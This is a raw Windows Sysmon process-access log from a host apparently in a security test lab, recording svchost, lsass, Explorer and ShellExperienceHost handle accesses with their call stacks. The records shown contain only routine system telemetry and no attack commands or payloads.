13:58:37.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.242{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.242{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000013164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000013163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000013162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000013161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-93FA-6005-FC04-00000000A301}37845672C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+37bbe|C:\Windows\System32\wpncore.dll+232a3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000013158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-93FA-6005-FC04-00000000A301}37845672C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+38e70|C:\Windows\System32\wpncore.dll+23267|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\